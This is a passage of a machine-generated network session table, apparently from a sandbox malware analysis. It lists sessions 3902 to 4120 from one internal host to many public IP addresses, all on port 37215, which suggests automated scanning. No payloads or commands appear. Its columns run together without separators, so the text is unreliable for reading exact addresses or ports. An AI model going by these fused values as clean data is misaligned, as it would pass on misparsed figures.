                                          3902192.168.2.2336888157.227.69.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3903192.168.2.2348740157.247.9.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3904192.168.2.235946241.46.154.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3905192.168.2.2351822157.74.18.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3906192.168.2.235280888.1.204.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3907192.168.2.2339014197.134.4.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3908192.168.2.2339758101.200.62.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3909192.168.2.2343984157.184.132.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3910192.168.2.234445441.14.46.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3911192.168.2.2358382126.128.77.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3912192.168.2.234303841.235.54.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3913192.168.2.2360334211.75.121.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3914192.168.2.2343532197.160.27.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3915192.168.2.234930041.61.175.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3916192.168.2.2355006157.135.180.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3917192.168.2.2357828165.222.247.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3918192.168.2.2345948197.218.56.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3919192.168.2.2353894197.159.196.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3920192.168.2.2344422197.133.163.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3921192.168.2.235302041.196.7.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3922192.168.2.234056441.177.176.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3923192.168.2.233784039.222.172.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3924192.168.2.2351990157.101.2.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3925192.168.2.234163041.2.38.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3926192.168.2.2352380197.254.37.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3927192.168.2.234025641.43.17.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3928192.168.2.233330241.112.175.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3929192.168.2.234410839.33.155.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3930192.168.2.2342336197.118.5.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3931192.168.2.2343960197.168.107.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3932192.168.2.235675641.210.117.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3933192.168.2.2338148157.218.22.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3934192.168.2.2355472197.103.148.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3935192.168.2.234585041.133.199.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3936192.168.2.2352178157.121.42.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3937192.168.2.235540465.43.139.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3938192.168.2.2344480197.192.122.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3939192.168.2.2357042197.51.21.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3940192.168.2.234385641.86.142.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3941192.168.2.23357129.165.22.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3942192.168.2.235164841.57.53.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3943192.168.2.235214441.231.105.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3944192.168.2.2334220165.8.191.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3945192.168.2.234236441.17.51.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3946192.168.2.2357902171.55.11.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3947192.168.2.2333412157.233.76.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3948192.168.2.2333074150.231.128.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3949192.168.2.2337910197.139.236.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3950192.168.2.233880041.8.96.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3951192.168.2.234169641.190.161.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3952192.168.2.2348070157.138.158.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3953192.168.2.2353554157.87.188.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3954192.168.2.2355232197.3.60.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3955192.168.2.23353244.34.204.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3956192.168.2.2346028153.107.228.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3957192.168.2.2357308157.129.154.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3958192.168.2.235461241.2.73.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3959192.168.2.234816441.5.40.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3960192.168.2.233902641.108.122.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3961192.168.2.2356554157.44.16.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3962192.168.2.2345420197.21.130.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3963192.168.2.2358512197.171.213.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3964192.168.2.2359488157.113.13.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3965192.168.2.2342886157.208.35.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3966192.168.2.2344500197.145.222.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3967192.168.2.2346370157.243.96.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3968192.168.2.2358938197.137.122.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3969192.168.2.234715041.246.176.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3970192.168.2.233624241.198.113.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3971192.168.2.2341356197.170.232.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3972192.168.2.2340398144.61.160.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3973192.168.2.2344754197.231.231.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3974192.168.2.2348084197.9.8.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3975192.168.2.2360978157.7.148.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3976192.168.2.2350196197.212.103.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3977192.168.2.2360420197.47.174.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3978192.168.2.2353326197.248.142.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3979192.168.2.2359186223.251.206.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3980192.168.2.2348768197.23.183.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3981192.168.2.2349518101.145.248.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3982192.168.2.2343980112.152.255.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3983192.168.2.235032041.101.238.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3984192.168.2.234031450.72.43.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3985192.168.2.234793677.3.90.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3986192.168.2.234725841.245.128.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3987192.168.2.2349360157.122.129.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3988192.168.2.2352864157.91.179.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3989192.168.2.2343590202.45.122.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3990192.168.2.234150841.76.143.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3991192.168.2.2348540197.186.149.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3992192.168.2.2334030157.52.23.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3993192.168.2.2345824197.11.78.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3994192.168.2.234386457.210.255.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3995192.168.2.2341556157.52.150.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3996192.168.2.2338032157.227.228.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3997192.168.2.2360168197.184.230.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3998192.168.2.2360634116.12.1.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3999192.168.2.2334680157.89.13.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4000192.168.2.2333890157.142.2.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4001192.168.2.236040841.239.26.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4002192.168.2.234030841.86.203.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4003192.168.2.2344868157.34.228.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4004192.168.2.235465441.127.200.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4005192.168.2.233351441.196.113.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4006192.168.2.2360496187.57.194.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4007192.168.2.2335416157.22.216.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4008192.168.2.2354310151.34.190.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4009192.168.2.234532259.161.14.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4010192.168.2.2350644197.28.205.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4011192.168.2.2349858197.62.197.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4012192.168.2.2351380157.101.76.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4013192.168.2.2351528145.247.58.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4014192.168.2.2340004197.31.195.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4015192.168.2.234343241.35.101.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4016192.168.2.2352020157.97.81.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4017192.168.2.2359040197.42.138.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4018192.168.2.2351576197.19.59.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4019192.168.2.2338908197.139.90.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4020192.168.2.2341764191.117.196.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4021192.168.2.2350034197.150.179.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4022192.168.2.2339344157.237.109.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4023192.168.2.2349596197.254.132.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4024192.168.2.234252841.138.227.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4025192.168.2.2335414197.212.210.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4026192.168.2.2345920207.201.235.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4027192.168.2.2358962157.86.57.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4028192.168.2.235419841.110.51.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4029192.168.2.234573072.164.101.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4030192.168.2.2345456129.46.129.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4031192.168.2.2340626157.47.153.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4032192.168.2.2339958157.29.127.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4033192.168.2.235686879.62.126.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4034192.168.2.2336000197.247.140.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4035192.168.2.2346380197.80.188.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4036192.168.2.2345592197.60.100.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4037192.168.2.2359594201.215.100.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4038192.168.2.2357602197.220.132.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4039192.168.2.2354506157.28.74.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4040192.168.2.2339464197.141.49.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4041192.168.2.2352730204.64.236.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4042192.168.2.233387241.139.90.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4043192.168.2.2336562197.231.160.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4044192.168.2.234492841.252.86.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4045192.168.2.2349320172.169.57.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4046192.168.2.2354954197.64.212.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4047192.168.2.234040241.14.247.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4048192.168.2.2341194157.16.210.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4049192.168.2.2348990157.93.149.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4050192.168.2.235777641.110.98.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4051192.168.2.2360198157.8.38.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4052192.168.2.2343342157.102.39.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4053192.168.2.235719241.8.197.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4054192.168.2.2340122157.250.46.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4055192.168.2.2338798157.97.174.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4056192.168.2.234451841.180.49.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4057192.168.2.2345876157.6.77.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4058192.168.2.234754441.71.162.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4059192.168.2.2335252197.186.141.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4060192.168.2.2337762169.116.92.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4061192.168.2.235450041.49.143.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4062192.168.2.2352406200.110.143.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4063192.168.2.235008441.57.136.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4064192.168.2.2343098197.222.179.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4065192.168.2.233473427.104.114.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4066192.168.2.235756041.141.200.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4067192.168.2.2337012157.80.86.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4068192.168.2.2341810197.123.83.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4069192.168.2.2347576197.86.33.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4070192.168.2.2342266115.1.6.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4071192.168.2.235646690.136.30.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4072192.168.2.233332678.188.238.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4073192.168.2.2337684157.50.89.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4074192.168.2.236095441.82.4.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4075192.168.2.23382828.144.191.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4076192.168.2.2349290157.250.226.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4077192.168.2.234313641.164.192.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4078192.168.2.2352048162.222.221.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4079192.168.2.234596453.189.54.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4080192.168.2.2343188157.70.151.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4081192.168.2.2338882197.78.107.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4082192.168.2.2346594197.3.95.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4083192.168.2.2360950157.176.163.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4084192.168.2.234615483.53.187.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4085192.168.2.2350368197.150.7.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4086192.168.2.2334308157.56.74.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4087192.168.2.2346326197.190.175.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4088192.168.2.2347430206.183.107.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4089192.168.2.233706241.236.242.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4090192.168.2.2357136197.114.16.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4091192.168.2.2350098157.51.108.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4092192.168.2.2342234197.220.221.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4093192.168.2.234394441.72.150.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4094192.168.2.2353316157.5.4.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4095192.168.2.2348558221.73.239.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4096192.168.2.2347538157.128.77.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4097192.168.2.2335696157.38.68.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4098192.168.2.2344266138.227.131.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4099192.168.2.2340534185.242.1.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4100192.168.2.2345406157.115.203.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4101192.168.2.2335568157.205.210.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4102192.168.2.2355948157.154.58.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4103192.168.2.233653099.167.137.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4104192.168.2.2353804157.199.175.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4105192.168.2.2357232197.154.158.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4106192.168.2.233317818.73.246.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4107192.168.2.235316451.143.119.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4108192.168.2.235251041.20.170.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4109192.168.2.2336594197.206.61.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4110192.168.2.235841841.60.101.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4111192.168.2.2351034178.210.117.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4112192.168.2.2336672197.197.140.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4113192.168.2.233577491.168.196.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4114192.168.2.2357018157.148.42.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4115192.168.2.2359610197.108.5.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4116192.168.2.235036641.71.234.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4117192.168.2.236019241.237.186.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4118192.168.2.2336162197.227.69.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4119192.168.2.235330241.214.163.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4120192.168.2.2357446157.118.234.11737215
